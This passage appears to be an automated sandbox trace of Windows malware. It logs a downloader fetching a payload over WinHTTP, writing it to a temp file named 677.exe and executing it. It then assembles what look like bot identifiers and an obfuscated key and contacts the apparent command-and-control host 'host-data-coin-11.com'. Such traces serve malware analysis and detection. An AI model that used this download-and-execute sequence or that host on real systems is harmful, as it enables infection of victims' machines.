lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0170.811] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xfdd9040, Size=0x1b0800) returned 0xf3f7040 [0170.983] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf5a5040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf5a5040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0170.983] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f7040, Size=0x1b3000) returned 0xfdd4040 [0171.042] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xff84840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xff84840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0171.043] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xfdd4040, Size=0x1b5800) returned 0xf3f5040 [0171.128] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf5a8040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf5a8040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0171.128] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f5040, Size=0x1b8000) returned 0xfdd0040 [0171.177] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xff85840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xff85840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0171.177] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xfdd0040, Size=0x1ba800) returned 0xf3fe040 [0171.308] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf5b6040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf5b6040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0171.309] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3fe040, Size=0x1bd000) returned 0xfdd1040 [0171.362] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xff8b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xff8b840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0171.362] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xfdd1040, Size=0x1bf800) returned 0xf3fe040 [0171.412] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf5bb040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf5bb040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0171.413] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3fe040, Size=0x1c2000) returned 0xfddc040 [0171.581] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xff9b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xff9b840*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x2800) returned 1 [0171.586] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xfddc040, Size=0x1c4800) returned 0xf3f5040 [0171.639] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xf5b7040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xf5b7040*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x200) returned 1 [0171.639] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0xf3f5040, Size=0x1c7000) returned 0xfdd0040 [0171.754] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0xff92240, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fcb8 | out: lpBuffer=0xff92240*, lpdwNumberOfBytesRead=0xfc4fcb8*=0x0) returned 1 [0171.755] VirtualAlloc (lpAddress=0x0, dwSize=0x1c2200, flAllocationType=0x3000, flProtect=0x4) returned 0xf3f0000 [0171.806] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0xfdd0040) returned 1 [0171.862] WinHttpCloseHandle (hInternet=0x4a18280) returned 1 [0171.862] WinHttpCloseHandle (hInternet=0x84fc360) returned 1 [0171.862] WinHttpCloseHandle (hInternet=0x833fdb0) returned 1 [0171.863] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9213920) returned 0x10c [0171.863] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9213920) returned 1 [0171.887] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x92138d0) returned 0x39 [0171.887] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x92138d0) returned 1 [0171.888] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x92138b0) returned 0x13 [0171.888] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x92138b0) returned 1 [0171.888] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x210) returned 0x9215d70 [0171.890] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x210) returned 0x9215f90 [0171.890] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x9215f90 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0171.890] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0171.890] GetTempFileNameW (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x9215f90 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\677.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\677.tmp")) returned 0x677 [0171.893] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\677.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\677.tmp")) returned 1 [0171.893] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\677.tmp") returned 44 [0171.893] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\677" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\677") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\677" [0171.893] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9215f90) returned 0x210 [0171.894] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9215f90) returned 1 [0171.894] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x12) returned 0x9210720 [0171.894] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\677", lpString2=".exe" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\677.exe") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\677.exe" [0171.894] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210720) returned 0x12 [0171.894] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210720) returned 1 [0171.895] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\677.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\677.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x212c [0171.895] WriteFile (in: hFile=0x212c, lpBuffer=0xf3f0000*, nNumberOfBytesToWrite=0x1c2200, lpNumberOfBytesWritten=0xfc4fd18, lpOverlapped=0x0 | out: lpBuffer=0xf3f0000*, lpNumberOfBytesWritten=0xfc4fd18*=0x1c2200, lpOverlapped=0x0) returned 1 [0171.953] CloseHandle (hObject=0x212c) returned 1 [0172.100] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName=0x0, lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\677.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpStartupInfo=0xfc4fd40*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xfc4fd20, hNewToken=0x0 | out: lpProcessInformation=0xfc4fd20*(hProcess=0x148c, hThread=0x212c, dwProcessId=0x224, dwThreadId=0x1d0), hNewToken=0x0) returned 1 [0172.233] CloseHandle (hObject=0x148c) returned 1 [0172.233] CloseHandle (hObject=0x212c) returned 1 [0172.233] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb9a57bda [0172.233] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0xba) returned 0x9210720 [0172.233] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9b3ec909 [0172.233] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x17627f9f [0172.233] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe31e954c [0172.233] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x600561ea [0172.233] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8f59877 [0172.233] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x98e584be [0172.233] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa157d7a3 [0172.233] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc2c6059a [0172.233] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa088b879 [0172.233] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6190a2b7 [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x13cfb8e9 [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7d977de5 [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x12cb9803 [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x85d84962 [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x739d5758 [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1e423e6f [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe7845d09 [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x679c98b8 [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x32280682 [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xac01b2d6 [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x526f303 [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x264b8be5 [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x664473cb [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1ddc3471 [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1dcf84f9 [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8050675b [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x148bdb03 [0172.234] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x222352e8 [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1dd3942f [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2d1f8d93 [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf36083ea [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8fb2f8e1 [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x26402822 [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6eeb4961 [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6ad21371 [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd1e8de7a [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3b1f5c7a [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x881fb278 [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x324bd5ab [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbbd672da [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa6062230 [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc803cc3f [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x28758145 [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3d01c115 [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf8d85acd [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5f6a68bb [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x65cf91cb [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xab1ba3bc [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb579b088 [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa884b6a [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x987b4d6c [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x29d8cfc1 [0172.235] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf106249f [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf878e34d [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x238ee790 [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc8841e0b [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe842b777 [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xaed3ad47 [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xcae73358 [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xde01606f [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa6181aae [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3cfa9f8e [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa5524cc0 [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x33ae1cf0 [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2a15d018 [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5e2ec965 [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x69791bf8 [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3e531338 [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa6c6e3f5 [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9a9a1ad3 [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb6b1c751 [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4680026f [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x613ab8a1 [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbc6e26e5 [0172.236] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xac296eb5 [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc34306b8 [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb807e06b [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa20434fd [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xae871d97 [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc2f9fe9b [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd5528183 [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3a185595 [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb50a50e1 [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe39d673 [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2e4df9d0 [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3299ecb [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf5c0829d [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x57e93734 [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5d40e8e5 [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd03b4796 [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x336637a8 [0172.237] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x10cc5788 [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb78c5750 [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xad22db00 [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x804577c0 [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x23e4feed [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb5f11331 [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x204bf718 [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x81378a0f [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5c86e971 [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbe7fb55b [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x705b471b [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd07154a0 [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xac24a5e9 [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8f3a6294 [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9ef597c2 [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7d0cc1ec [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x368e5292 [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5c3e2b2 [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe011d5c0 [0172.238] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd4eac3a3 [0172.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x97871dd4 [0172.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1db8a567 [0172.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb71cd5e3 [0172.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc2742280 [0172.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5ee68854 [0172.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3341b77b [0172.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7314aa0b [0172.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x31f9968c [0172.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4eac8858 [0172.239] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb18fc282 [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb2dedc03 [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfeea77bd [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf38c30a3 [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd473858 [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x26a671ed [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x53be1fa7 [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x43fe665d [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xdab075a8 [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb35ee60a [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x43b94cf4 [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa26ac240 [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe89ddb96 [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xabe43db6 [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb96e0721 [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xee46fb85 [0172.240] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xefe31431 [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3b1aa932 [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x701beb1 [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd63928b2 [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbe2305b1 [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8531e15f [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x27368761 [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc517e1c0 [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x269635fc [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9261ac41 [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x93eb383d [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x33c5098c [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x969b5afb [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x67087948 [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x76748297 [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8b90c7e4 [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8170fb31 [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd94f166f [0172.241] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x33317965 [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfbce63ec [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd38c74ed [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8f68d418 [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x80c05c67 [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb02925cc [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x70a228d6 [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xcc10b9e9 [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2e3c858d [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5ffcc494 [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xea39058c [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa9648d69 [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa21e4fed [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7efede7a [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x234e809e [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbace8363 [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9c28a523 [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1c132ef3 [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd0f72465 [0172.242] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1785a78c [0172.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc07790c1 [0172.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6d455882 [0172.243] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x56cd7266 [0172.243] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x109) returned 0x9215f90 [0172.243] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0172.243] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0172.243] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0172.243] lstrcatA (in: lpString1="", lpString2="(2#K>y,;^\"Ll^+-\\0g1gR^V*nZrGl4M\\wbjqa]\\=/bvTH<,u/igAv!w5=+(c+JDHJ&:*_Z6*Zl@@:gNpsBGOGgE=RvQFnR^+6iyYa%OH#\"rsaP\"Q9/8\"HQz6TCQ#1)KDPv%09PdXs[lp7\"%D5@f(->oDe3t&OODLCWFT6dy$ci" | out: lpString1="(2#K>y,;^\"Ll^+-\\0g1gR^V*nZrGl4M\\wbjqa]\\=/bvTH<,u/igAv!w5=+(c+JDHJ&:*_Z6*Zl@@:gNpsBGOGgE=RvQFnR^+6iyYa%OH#\"rsaP\"Q9/8\"HQz6TCQ#1)KDPv%09PdXs[lp7\"%D5@f(->oDe3t&OODLCWFT6dy$ci") returned="(2#K>y,;^\"Ll^+-\\0g1gR^V*nZrGl4M\\wbjqa]\\=/bvTH<,u/igAv!w5=+(c+JDHJ&:*_Z6*Zl@@:gNpsBGOGgE=RvQFnR^+6iyYa%OH#\"rsaP\"Q9/8\"HQz6TCQ#1)KDPv%09PdXs[lp7\"%D5@f(->oDe3t&OODLCWFT6dy$ci" [0172.243] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x10c) returned 0x92160b0 [0172.243] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0172.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9211840, cbMultiByte=30, lpWideCharStr=0x92160b0, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0172.243] WinHttpGetIEProxyConfigForCurrentUser (in: 